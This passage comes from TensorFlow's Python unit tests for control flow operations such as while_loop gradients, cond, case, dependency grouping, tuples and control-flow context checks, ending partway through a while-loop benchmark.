indices = constant_op.constant(
[[0], [3]], dtype=dtypes.int64, name="indices")
shape = constant_op.constant([10], dtype=dtypes.int64, name="dense_shape")
i = constant_op.constant(0)
x = sparse_tensor.SparseTensor(indices, values, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
sparse_tensor.SparseTensor(x.indices, x.values * 2.0, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
r = gradients_impl.gradients(r.values, values)[0]
self.assertAllClose(np.array([1024.0, 1024.0]), r.eval())
@test_util.disable_control_flow_v2("b/115920078 (gradients)")
def testCallGradInLoop(self):
with self.cached_session() as sess:
i0 = constant_op.constant(0)
params = constant_op.constant(5.0)
params_1 = math_ops.square(params)
def c(i, _):
return i < 10
def b(i, x):
data = constant_op.constant([1.0, 2.0, 3.0])
data = math_ops.multiply(data, params_1)
x1 = x + gradients_impl.gradients(data, params)[0]
return i + 1, x1
output_grad = control_flow_ops.while_loop(
c, b, [i0, constant_op.constant(0.0)])
self.assertAllClose(600.0, sess.run(output_grad)[1])
@test_util.disable_control_flow_v2(
"b/116255781 (flat_args), b/115660901 (TensorArray)")
def testWhileAndTensorArray(self):
with self.cached_session() as sess:
param = constant_op.constant(2.0)
n0 = constant_op.constant(0)
y0 = constant_op.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], name="elems")
def c(i, _):
return i < 10
def b(i, y):
return [
i + 1,
functional_ops.map_fn(lambda x: math_ops.multiply(x, param), y)
]
r = control_flow_ops.while_loop(c, b, [n0, y0], parallel_iterations=1)
r = gradients_impl.gradients(r, param)[0]
self.assertAllClose(107520.0, sess.run(r))
def testWhileGrad_StopGrad(self):
with self.cached_session():
x = constant_op.constant(3.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x, y: math_ops.less(x, 100.0)
def b(x, y):
y1 = math_ops.square(y)
x1 = math_ops.add(math_ops.square(x), y1)
return x1, y1
rx, ry = control_flow_ops.while_loop(c, b, [x, y])
r = gradients_impl.gradients(rx, y)[0]
self.assertEqual(136.0, r.eval())
r = gradients_impl.gradients(ry, y)[0]
self.assertEqual(32.0, r.eval())
r = gradients_impl.gradients(array_ops.stop_gradient(rx), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(array_ops.stop_gradient(ry), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(
array_ops.stop_gradient(math_ops.square(rx)), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(
array_ops.stop_gradient(math_ops.add(rx, ry)), x)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(
array_ops.stop_gradient(math_ops.add(rx, ry)), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(math_ops.add(rx, ry), y)[0]
self.assertEqual(168.0, r.eval())
r = gradients_impl.gradients(
math_ops.add(rx, array_ops.stop_gradient(ry)), y)[0]
self.assertEqual(136.0, r.eval())
r = gradients_impl.gradients(
math_ops.add(array_ops.stop_gradient(rx), ry), y)[0]
self.assertEqual(32.0, r.eval())
def testWhileGrad_StopGradInside(self):
with self.cached_session():
x = constant_op.constant(3.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x, y: math_ops.less(x, 100.0)
def b(x, y):
y1 = array_ops.stop_gradient(math_ops.square(y))
x1 = math_ops.add(math_ops.square(x), y1)
return x1, y1
rx, _ = control_flow_ops.while_loop(c, b, [x, y])
r = gradients_impl.gradients(rx, y)[0]
self.assertAllClose(0.0, r.eval())
r = gradients_impl.gradients(rx, x)[0]
self.assertAllClose(156.0, r.eval())
def testWhileGrad_StopGradInsideNoShape(self):
with self.cached_session() as sess:
x = array_ops.placeholder(dtypes.float32)
y = array_ops.placeholder(dtypes.float32)
c = lambda x, y: math_ops.less(math_ops.reduce_sum(x), 100.0)
def b(x, y):
y1 = array_ops.stop_gradient(math_ops.square(y, name="stopped"))
x1 = math_ops.add(math_ops.square(x), y1)
return x1, y1
rx, _ = control_flow_ops.while_loop(c, b, [x, y])
r = gradients_impl.gradients(rx, y)[0]
feed_dict = {x: [3.0, 4.0], y: [2.0, 3.0]}
self.assertAllClose([0.0, 0.0], sess.run(r, feed_dict=feed_dict))
r = gradients_impl.gradients(rx, x)[0]
self.assertAllClose([156.0, 400.0], sess.run(r, feed_dict=feed_dict))
name = "gradients/while/stopped_grad"
all_ops = x.graph.get_operations()
self.assertFalse(any([name in op.name for op in all_ops]))
@test_util.disable_control_flow_v2("b/116255781 (flat args)")
def testWhileGradGradFail(self):
theta = variables.Variable(initial_value=1.)
def fn(prev, x):
return prev + x * theta
result = functional_ops.scan(fn, np.array([1., 2., 3.], dtype=np.float32))
grad_theta = gradients_impl.gradients(result, theta)
with self.assertRaisesRegexp(TypeError, "Second-order gradient"):
gradients_impl.gradients(grad_theta, theta)
grad_theta_stopped = array_ops.stop_gradient(grad_theta)
gradients_impl.gradients(grad_theta_stopped, theta)
def testStopGradOnWhileGrad(self):
with self.cached_session():
x = constant_op.constant(2.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x: math_ops.less(x, 100.0)
b = lambda x: math_ops.multiply(x, y)
rx = control_flow_ops.while_loop(c, b, [x])
rg = gradients_impl.gradients(rx, y)[0]
rg = array_ops.stop_gradient(rg)
r = math_ops.add(math_ops.square(y), rx)
r = math_ops.add(r, rg)
r = gradients_impl.gradients(r, y)[0]
self.assertEqual(388.0, r.eval())
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileGradientWithNontrainablePath1(self):
q = variables.Variable([7., 8.])
def cond(_, y):
del y
return False
def body(x, _):
return x, math_ops.cast(x, dtypes.float32) + math_ops.reduce_sum(q)
_, y = control_flow_ops.while_loop(cond, body, (math_ops.argmin(q), 0.))
dy_dq, = gradients_impl.gradients(y, q)
self.assertIsNotNone(dy_dq)
with self.cached_session() as sess:
sess.run(q.initializer)
self.assertAllClose([0., 0.], sess.run(dy_dq))
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileGradientWithNontrainablePath2(self):
q = variables.Variable([7., 8.])
def cond(_, y):
return math_ops.equal(y, 0.)
def body(x, _):
zero = constant_op.constant(0, dtype=dtypes.int64)
return zero, math_ops.cast(x, dtypes.float32) + math_ops.reduce_sum(q)
_, y = control_flow_ops.while_loop(cond, body, (math_ops.argmin(q), 0.))
dy_dq, = gradients_impl.gradients(y, q)
self.assertIsNotNone(dy_dq)
with self.cached_session() as sess:
sess.run(q.initializer)
self.assertAllClose([1., 1.], sess.run(dy_dq))
@test_util.disable_control_flow_v2("b/115920078 (gradients)")
def testIssue16504(self):
c = constant_op.constant(np.arange(100), dtype=dtypes.float32)
w = variables.Variable(
initial_value=np.ones(100), dtype=dtypes.float32) / 100
k = variables.Variable(0, dtype=dtypes.int32)
chg_w = constant_op.constant(np.inf, dtype=dtypes.float32)
def cond(k, _, chg_w):
return math_ops.logical_and(k < 10, chg_w > 1e-3)
def body(k, w, chg_w):
grad, = gradients_impl.gradients(-math_ops.reduce_sum(w * c), w)
w_n = w * math_ops.exp(-0.1 * grad)
w_n /= math_ops.reduce_sum(w_n)
chg_w = (
math_ops.reduce_sum(math_ops.abs(w_n - w)) / math_ops.reduce_sum(
math_ops.abs(w)))
return k + 1, w_n, chg_w
_, w, _ = control_flow_ops.while_loop(cond, body, [k, w, chg_w])
grad, = gradients_impl.gradients(w, c)
self.assertIsNotNone(grad)
@test_util.disable_control_flow_v2("b/116270461 (resource)")
def testStopGradMultiFlows(self):
with self.cached_session():
def body(i, y, r):
x = variable_scope.get_variable(
"x",
shape=(),
dtype=dtypes.float32,
initializer=init_ops.ones_initializer())
y *= x
return [i + 1, y, r + math_ops.reduce_sum(y)]
i0 = constant_op.constant(0)
y0 = array_ops.ones(5)
r0 = constant_op.constant(0.0)
cond = lambda i, y, r: i < 1
_, _, r = control_flow_ops.while_loop(
cond, body, [i0, y0, r0], back_prop=True)
vars_ = variables.global_variables()
grads = linalg_ops.norm(gradients_impl.gradients(r, vars_)[0])
z = math_ops.add(r, array_ops.stop_gradient(math_ops.reduce_sum(grads)))
result = gradients_impl.gradients(z, vars_)[0]
variables.global_variables_initializer().run()
self.assertEqual(5.0, result.eval())
def testOneValueCond(self):
with self.cached_session():
c = array_ops.placeholder(dtypes.int32, shape=[])
one = ops.convert_to_tensor(1, name="one")
two = ops.convert_to_tensor(2, name="two")
p = math_ops.greater_equal(c, 1)
i = control_flow_ops.cond(p, lambda: one, lambda: two)
self.assertTrue(isinstance(i, ops.Tensor))
# True case: c = 2 is >= 1
self.assertEqual([1], i.eval(feed_dict={c: 2}))
# False case: c = 0 is not >= 1
self.assertEqual([2], i.eval(feed_dict={c: 0}))
def testExampleCond(self):
with self.cached_session():
x = ops.convert_to_tensor([-2.0, 2.0], name="x")
d = array_ops.placeholder(dtypes.int32, shape=[])
def l2():
return math_ops.sqrt(math_ops.reduce_sum(math_ops.square(x)))
def l1():
return math_ops.reduce_sum(math_ops.abs(x))
i = control_flow_ops.cond(math_ops.equal(d, 2), l2, l1)
self.assertAllClose(4.0, i.eval(feed_dict={d: 1}))
self.assertAllClose(2.0 * math.sqrt(2), i.eval(feed_dict={d: 2}))
@test_util.disable_control_flow_v2(
"b/112477618 (Operation returned from cond)")
def testCase(self):
with self.cached_session():
x = constant_op.constant(1)
y = constant_op.constant(2)
z = constant_op.constant(3)
f1 = lambda: constant_op.constant(17)
f2 = lambda: constant_op.constant(23)
f3 = lambda: constant_op.constant(-1)
r1 = control_flow_ops.case(
{
x < y: f1,
x > z: f2
}, default=f3, exclusive=True)
self.assertAllEqual(r1.eval(), 17)
r2 = control_flow_ops.case([(y > z, f1), (y > x, f2)], default=f3)
self.assertAllEqual(r2.eval(), 23)
# Duplicate events can happen, first one is selected
r3 = control_flow_ops.case([(x < y, f1), (x < y, f2)], default=f3)
self.assertAllEqual(r3.eval(), 17)
# Duplicate events cause an error if exclusive = True
r4 = control_flow_ops.case(
[(x < y, f1), (x < y, f2)], default=f3, exclusive=True)
with self.assertRaisesOpError("Input error:"):
r4.eval()
# Check that the default is called if none of the others are
r5 = control_flow_ops.case({x > y: f1}, default=f3)
self.assertAllEqual(r5.eval(), -1)
ran_once = [False, False, False]
def break_run_twice(ix):
def _break():
ran_once[ix] = True
return constant_op.constant(ix)
return _break
# Should not fail - each conditional gets called exactly once
# except default. Default gets called twice: once to create an
# empty output and once for the actual cond switch.
r6 = control_flow_ops.case(
[(x < y, break_run_twice(0)), (x > y, break_run_twice(1))],
default=lambda: constant_op.constant(2))
self.assertAllEqual(r6.eval(), 0)
@test_util.disable_control_flow_v2(
"b/112477618 (Operation returned from cond)")
def testCaseSideEffects(self):
with self.cached_session() as sess:
v0 = variables.Variable(-1)
v1 = variables.Variable(-1)
v2 = variables.Variable(-1)
a = lambda: control_flow_ops.with_dependencies([state_ops.assign(v0, 0)], 0)
b = lambda: control_flow_ops.with_dependencies([state_ops.assign(v1, 1)], 1)
c = lambda: control_flow_ops.with_dependencies([state_ops.assign(v2, 2)], 2)
x = constant_op.constant(1)
y = constant_op.constant(2)
r0 = control_flow_ops.case(
((x < y, a), (x > y, b)), default=c, exclusive=True)
r1 = control_flow_ops.case(
((x > y, a), (x < y, b)), default=c, exclusive=True)
r2 = control_flow_ops.case(
((x > y, a), (x > y, b)), default=c, exclusive=True)
variables.global_variables_initializer().run()
self.assertAllEqual(sess.run([v0, v1, v2]), [-1] * 3)
self.assertEqual(2, r2.eval())
self.assertAllEqual(sess.run([v0, v1, v2]), [-1, -1, 2])
variables.global_variables_initializer().run()
self.assertAllEqual(sess.run([v0, v1, v2]), [-1] * 3)
self.assertEqual(1, r1.eval())
self.assertAllEqual(sess.run([v0, v1, v2]), [-1, 1, -1])
variables.global_variables_initializer().run()
self.assertAllEqual(sess.run([v0, v1, v2]), [-1] * 3)
self.assertEqual(0, r0.eval())
self.assertAllEqual(sess.run([v0, v1, v2]), [0, -1, -1])
@test_util.disable_control_flow_v2("b/113324949 (ref vars)")
def testOneOpCond(self):
with self.cached_session():
v = variables.Variable(0)
c = ops.convert_to_tensor(0)
one = ops.convert_to_tensor(1)
two = ops.convert_to_tensor(2)
p = math_ops.greater_equal(c, 1)
def a():
return state_ops.assign(v, one)
def b():
return state_ops.assign(v, two)
i = control_flow_ops.cond(p, a, b)
self.assertTrue(isinstance(i, ops.Tensor))
variables.global_variables_initializer().run()
self.assertEqual(0, v.eval())
# True case: c = 2 is >= 1, v is set to 1.
self.assertEqual(1, i.eval(feed_dict={c.name: 2}))
self.assertEqual(1, v.eval())
# False case: c = 0 is not >= 1, v is set to 2.
self.assertEqual(2, i.eval(feed_dict={c.name: 0}))
self.assertEqual(2, v.eval())
def testWithOpsDependencies(self):
with self.cached_session() as sess:
v = variables.VariableV1(0.0)
c = constant_op.constant(10)
# Fetching v directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
sess.run([c, v])
# Use a control dependency to ensure init_variable is run
# while asking for c
real_v = control_flow_ops.with_dependencies(
name="real_tensor",
output_tensor=v._ref(), # pylint: disable=protected-access
dependencies=[v.initializer])
c_val, real_v_val = sess.run([c, real_v])
# Ensure the result of 'real_c' is the same as 'c'
self.assertAllEqual(10, c_val)
# Ensure that 'v' is initialized
self.assertAllClose(0.0, real_v_val)
def testWithTensorDependencies(self):
with self.cached_session():
v = variables.VariableV1(0.0)
c1 = constant_op.constant(10)
c2 = constant_op.constant(20)
# c1_with_init_v depends on the init op for v
c1_with_init_v = control_flow_ops.with_dependencies(
name="c1_with_init_v", output_tensor=c1, dependencies=[v.initializer])
# c2_with_c1 depends on the value of c1_with_init_v
c2_with_c1_dep = control_flow_ops.with_dependencies(
name="c2_with_c1_dep",
output_tensor=c2,
dependencies=[c1_with_init_v])
# Fetching v directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v.eval()
# Get the value of 'c2_with_c1_dep', which should cause 'v'
# to be initialized.
self.assertAllEqual(20, c2_with_c1_dep.eval())
# Ensure that 'v' is initialized
self.assertAllClose(0.0, v.eval())
def testWithIndexedSlicesDependencies(self):
with self.cached_session():
v = variables.VariableV1(
np.array([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]]).astype(np.float32))
v_at_1 = ops.IndexedSlices(v, constant_op.constant([1]))
gather_v_at_1 = array_ops.gather(v_at_1.values, v_at_1.indices)
v_at_1_after_init = control_flow_ops.with_dependencies([v.initializer],
v_at_1)
gather_v_at_1_after_init = array_ops.gather(v_at_1_after_init.values,
v_at_1_after_init.indices)
# Fetching gather_v_at_1 will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
gather_v_at_1.eval()
# Getting gather_v_at_1_after_init will work, and initialize v.
self.assertAllEqual([[10.0, 11.0]], gather_v_at_1_after_init.eval())
# Double check that 'v' is initialized
self.assertAllClose([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]], v.eval())
def testDependenciesDevice(self):
with ops.Graph().as_default():
# device set on tensor => same device on dep.
with ops.device("/job:ps"):
vd = variables.VariableV1([0.0])
with_vd_dep = control_flow_ops.with_dependencies([vd.initializer], vd)
self.assertTrue("/job:ps" in with_vd_dep.device)
# No device set on tensor => no device on dep.
vnod = variables.VariableV1([0.0])
with_vnod_dep = control_flow_ops.with_dependencies([vnod.initializer],
vnod)
self.assertDeviceEqual(None, with_vnod_dep.device)
# device set on tensor, default device on graph => default device on dep.
vdef = variables.VariableV1([0.0], name="vdef")
with ops.device("/job:worker/device:GPU:1"):
with_vdef_dep = control_flow_ops.with_dependencies([vdef.initializer],
vdef)
# The device is empty, but the colocation constraint is set.
self.assertDeviceEqual("", with_vdef_dep.device)
self.assertEqual([b"loc:@vdef"], with_vdef_dep.op.colocation_groups())
def testGroup(self):
with self.cached_session() as sess:
v1 = variables.VariableV1([0.0])
v2 = variables.VariableV1([1.0])
# Group init1 and init2 and run.
init = control_flow_ops.group(v1.initializer, v2.initializer)
# Fetching v1 directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v1.eval()
# Runs "init" before fetching v1 and v2.
init.run()
v1_val, v2_val = sess.run([v1, v2])
# Ensure that v1 and v2 are initialized
self.assertAllClose([0.0], v1_val)
self.assertAllClose([1.0], v2_val)
def testGroupEmpty(self):
op = control_flow_ops.group()
self.assertEqual(op.type, "NoOp")
self.assertEqual(op.control_inputs, [])
def testMergeShapes(self):
# All inputs unknown.
p1 = array_ops.placeholder(dtypes.float32)
p2 = array_ops.placeholder(dtypes.float32)
p3 = array_ops.placeholder(dtypes.float32)
m, index = control_flow_ops.merge([p1, p2, p3])
self.assertIs(None, m.get_shape().ndims)
self.assertEqual([], index.get_shape())
# All inputs known with different ranks.
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[1, 2, 3])
m, index = control_flow_ops.merge([p1, p2])
self.assertIs(None, m.get_shape().ndims)
self.assertEqual([], index.get_shape())
# All inputs known with some dimensions different.
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[2, 1])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, None], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[2, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
# All inputs known with same dimensions.
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([1, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[None, None])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, None])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, None], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
def testRefSelect(self):
index = array_ops.placeholder(dtypes.int32)
# All inputs unknown.
p1 = array_ops.placeholder(dtypes.float32)
p2 = array_ops.placeholder(dtypes.float32)
p3 = array_ops.placeholder(dtypes.float32)
v1 = variables.VariableV1(p1, validate_shape=False)
v2 = variables.VariableV1(p2, validate_shape=False)
v3 = variables.VariableV1(p3, validate_shape=False)
self.assertIs(None, v1.get_shape().ndims)
s = control_flow_ops.ref_select(index, [v1, v2, v3])
self.assertIs(None, s.get_shape().ndims)
# All inputs known but different.
v1 = variables.VariableV1([[1, 2]])
v2 = variables.VariableV1([[2], [1]])
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertIs(None, s.get_shape().ndims)
# All inputs known and same.
v1 = variables.VariableV1([[1, 2]])
v2 = variables.VariableV1([[1, 2]])
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertEqual([1, 2], s.get_shape())
# Possibly the same but not guaranteed.
v1 = variables.VariableV1([[1., 2.]])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
v2 = variables.VariableV1(p2, validate_shape=False)
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertEqual(None, s.get_shape())
def testRunLoopTensor(self):
with self.cached_session() as sess:
tensor_list = []
def condition(t):
return t < constant_op.constant(5)
def body(_):
tensor_list.append(constant_op.constant(5))
return constant_op.constant(10)
result = control_flow_ops.while_loop(condition, body,
[constant_op.constant(4)])
self.assertEqual(10, sess.run(result))
# Ensure that we cannot run a tensor that escapes the loop body
# accidentally.
with self.assertRaises(ValueError):
sess.run(tensor_list[0])
def testWhilePyFuncBasic(self):
def func(x):
return np.square(x)
with self.cached_session():
r = control_flow_ops.while_loop(
lambda i, v: i < 4,
lambda i, v: [i + 1, script_ops.py_func(func, [v], [dtypes.float32])[0]],
[constant_op.constant(0), constant_op.constant(2.0, dtypes.float32)],
[tensor_shape.unknown_shape(), tensor_shape.unknown_shape()])
self.assertEqual(r[1].eval(), 65536.0)
def testWhileFuncBasic(self):
@function.Defun(dtypes.float32)
def func(x):
return math_ops.square(math_ops.square(x))
with self.cached_session():
x = constant_op.constant(2.0, dtypes.float32)
r = control_flow_ops.while_loop(
lambda i, v: i < 2, lambda i, v: [i + 1, func(v)],
[constant_op.constant(0), x],
[tensor_shape.unknown_shape(),
tensor_shape.unknown_shape()])
self.assertEqual(r[1].eval(), 65536.0)
r = gradients_impl.gradients(r, x)[0]
self.assertEqual(r.eval(), 524288.0)
# while_v2 does not have stacks.
if not control_flow_ops.ENABLE_WHILE_V2:
self.assertEqual(
len([op for op in x.graph.get_operations() if op.type == "StackV2"
]), 1)
class ControlFlowContextCheckTest(test.TestCase):
def _getWhileTensor(self):
"""Creates and returns a tensor from a while context."""
tensor = []
def body(i):
if not tensor:
tensor.append(constant_op.constant(1))
return i + tensor[0]
control_flow_ops.while_loop(lambda i: i < 10, body, [0])
return tensor[0]
def _getCondTensor(self):
cond_tensor = []
def true_fn():
if not cond_tensor:
cond_tensor.append(constant_op.constant(1))
return cond_tensor[0]
control_flow_ops.cond(
math_ops.less(1, 2), true_fn, lambda: constant_op.constant(0))
return cond_tensor[0]
def testInvalidContext(self):
# Accessing a while loop tensor outside of control flow is illegal.
while_tensor = self._getWhileTensor()
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'while/Const_1' as input to 'Add' because 'while/Const_1' "
"is in a while loop. See info log for more details."):
math_ops.add(1, while_tensor)
def testInvalidContextInCond(self):
# Accessing a while loop tensor in cond is illegal.
while_tensor = self._getWhileTensor()
with self.assertRaisesRegexp(
ValueError, "Cannot use 'while/Const_1' as input to 'cond/Add' because "
"'while/Const_1' is in a while loop. See info log for more details."):
# TODO(skyewm): this passes if we return while_tensor directly instead
# of using it as input to another op.
control_flow_ops.cond(
math_ops.less(1, 2), lambda: math_ops.add(1, while_tensor),
lambda: constant_op.constant(0))
def testInvalidContextInWhile(self):
# Accessing a while loop tensor in a different while loop is illegal.
while_tensor = self._getWhileTensor()
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'while_1/Add' as input to 'while/Const_1' because they are "
"in different while loops. See info log for more details."):
control_flow_ops.while_loop(lambda i: i < 10,
lambda x: math_ops.add(1, while_tensor), [0])
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'while_2/NextIteration' as input to 'while/Const_1' "
"because they are in different while loops. See info log for more "
"details."):
control_flow_ops.while_loop(lambda i: i < 10, lambda i: while_tensor, [0])
def testValidCondContext(self):
# Accessing a tensor from a cond context is OK (although dangerous).
cond_tensor = self._getCondTensor()
math_ops.add(1, cond_tensor)
def testValidCondContextBranches(self):
# Accessing a tensor from a cond context from the other branch's cond
# context is OK (although dangerous).
cond_tensor = []
def branch_fn():
if not cond_tensor:
cond_tensor.append(constant_op.constant(1))
return cond_tensor[0]
control_flow_ops.cond(math_ops.less(1, 2), branch_fn, branch_fn)
def testValidWhileContext(self):
# Accessing a tensor in a nested while is OK.
def body(_):
c = constant_op.constant(1)
return control_flow_ops.while_loop(lambda i: i < 3, lambda i: i + c, [0])
control_flow_ops.while_loop(lambda i: i < 5, body, [0])
def testValidNestedContexts(self):
# Accessing a tensor from a cond context in a while context, all inside an
# outer while context, is OK.
def body(_):
cond_tensor = self._getCondTensor()
# Create another cond containing the while loop for good measure
return control_flow_ops.cond(
math_ops.less(1, 2),
lambda: control_flow_ops.while_loop(lambda i: i < 3,
lambda i: i + cond_tensor, [0]),
lambda: constant_op.constant(0))
control_flow_ops.while_loop(lambda i: i < 5, body, [0])
def testInvalidNestedContexts(self):
# Accessing a tensor from a while context in a different while context, all
# inside a cond context, is illegal.
def true_fn():
while_tensor = self._getWhileTensor()
return control_flow_ops.while_loop(lambda i: i < 3,
lambda i: i + while_tensor, [0])
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'cond/while_1/add' as input to 'cond/while/Const_1' because"
" they are in different while loops. See info log for more details."):
control_flow_ops.cond(
math_ops.less(1, 2), true_fn, lambda: constant_op.constant(0))
class TupleTest(test.TestCase):
def testTensors(self):
for v1_first in [True, False]:
with self.cached_session():
v1 = variables.VariableV1([1.0])
add1 = math_ops.add(
control_flow_ops.with_dependencies([v1.initializer], v1._ref()), # pylint: disable=protected-access
2.0)
v2 = variables.VariableV1([10.0])
add2 = math_ops.add(
control_flow_ops.with_dependencies([v2.initializer], v2._ref()), # pylint: disable=protected-access
20.0)
t1, _, t2 = control_flow_ops.tuple([add1, None, add2])
# v1 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v1.eval()
# v2 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v2.eval()
if v1_first:
# Getting t1 initializes v2.
self.assertAllClose([3.0], t1.eval())
self.assertAllClose([10.0], v2.eval())
else:
# Getting t2 initializes v1.
self.assertAllClose([30.0], t2.eval())
self.assertAllClose([1.0], v1.eval())
def testIndexedSlices(self):
for v1_first in [True, False]:
with self.cached_session():
v1 = variables.VariableV1(
np.array([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]]).astype(
np.float32))
v1_at_1 = ops.IndexedSlices(
control_flow_ops.with_dependencies([v1.initializer], v1._ref()), # pylint: disable=protected-access
constant_op.constant([1]))
v2 = variables.VariableV1(
np.array([[0.1, 1.1], [10.1, 11.1], [20.1, 21.1]]).astype(
np.float32))
v2_at_1 = ops.IndexedSlices(
control_flow_ops.with_dependencies([v2.initializer], v2._ref()), # pylint: disable=protected-access
constant_op.constant([1]))
st1, st2 = control_flow_ops.tuple([v1_at_1, v2_at_1])
g1 = array_ops.gather(st1.values, st1.indices)
g2 = array_ops.gather(st2.values, st2.indices)
# v1 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v1.eval()
# v2 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v2.eval()
if v1_first:
# Getting g1 initializes v2.
self.assertAllClose([[10.0, 11.0]], g1.eval())
self.assertAllClose([[0.1, 1.1], [10.1, 11.1], [20.1, 21.1]],
v2.eval())
else:
# Getting g2 initializes v1.
self.assertAllClose([[10.1, 11.1]], g2.eval())
self.assertAllClose([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]],
v1.eval())
def testAcceptTensorsAsControlInputs(self):
with self.cached_session():
var = variables.VariableV1(0)
assign = state_ops.assign(var, 1)
t, = control_flow_ops.tuple(
[constant_op.constant(0)], control_inputs=[assign])
# Should trigger the assign.
t.eval()
self.assertEquals(1, var.eval())
class AssertTest(test.TestCase):
def testGuardedAssertDoesNotCopyWhenTrue(self):
with self.test_session(use_gpu=True) as sess:
with ops.device(test.gpu_device_name()):
value = constant_op.constant(1.0)
with ops.device("/cpu:0"):
true = constant_op.constant(True)
guarded_assert = control_flow_ops.Assert(true, [value], name="guarded")
unguarded_assert = gen_logging_ops._assert(
true, [value], name="unguarded")
opts = config_pb2.RunOptions(trace_level=config_pb2.RunOptions.FULL_TRACE)
guarded_metadata = config_pb2.RunMetadata()
sess.run(guarded_assert, options=opts, run_metadata=guarded_metadata)
unguarded_metadata = config_pb2.RunMetadata()
sess.run(unguarded_assert, options=opts, run_metadata=unguarded_metadata)
guarded_nodestat_names = [
n.node_name
for d in guarded_metadata.step_stats.dev_stats
for n in d.node_stats
]
unguarded_nodestat_names = [
n.node_name
for d in unguarded_metadata.step_stats.dev_stats
for n in d.node_stats
]
guarded_memcpy_nodestat_names = [
n for n in guarded_nodestat_names if "MEMCPYDtoH" in n
]
unguarded_memcpy_nodestat_names = [
n for n in unguarded_nodestat_names if "MEMCPYDtoH" in n
]
if "GPU" in [d.device_type for d in device_lib.list_local_devices()]:
# A copy was performed for the unguarded assert
self.assertLess(0, len(unguarded_memcpy_nodestat_names))
# No copy was performed for the guarded assert
self.assertEqual([], guarded_memcpy_nodestat_names)
class WhileOpBenchmark(test.Benchmark):
"""Evaluate the performance of while_loop op."""
def _getInitVariables(self):
batch_size = 10
image_size = 256
kernel_size = 3
depth = 16
init_step = constant_op.constant(-1)
image = variable_scope.get_variable(
"image",
initializer=random_ops.random_normal(
[batch_size, image_size, image_size, depth],
dtype=dtypes.float32,
stddev=1e-1))
kernel = variable_scope.get_variable(
"weights",
initializer=random_ops.truncated_normal(
[kernel_size, kernel_size, depth, depth],
dtype=dtypes.float32,
stddev=1e-1))
return init_step, image, kernel
def _runOneBenchmark(self,
default_device,
num_iters=10,
static_unroll=False,
steps=10):
"""Evaluate the while loop performance.
Args:
default_device: The default device to run all ops except the loop_body.
loop_body is always run on GPU.
num_iters: Number of iterations to run.
static_unroll: If true, run unrolled version; otherwise, run while_loop.
steps: Total number of repeated steps to run the loop.
Returns:
The duration of the run in seconds.
"""
def loop_body(i, x):
with ops.device("/gpu:0"):
# Always put loop body on GPU.
nx = nn_ops.conv2d(
input=x,
filter=kernel,
strides=[1, 1, 1, 1],
padding="SAME",
data_format="NHWC",
name="conv2d")
ni = math_ops.add(i, 1)
return ni, nx
ops.reset_default_graph()
with session.Session() as sess, ops.device(default_device):
# Get the initial id i, input x, and kernel.
i, x, kernel = self._getInitVariables()
sess.run(variables.global_variables_initializer())
if static_unroll:
for _ in xrange(steps):
i, x = loop_body(i, x)
else:
i, x = control_flow_ops.while_loop(
lambda i, _: i < steps,
loop_body, [i, x],
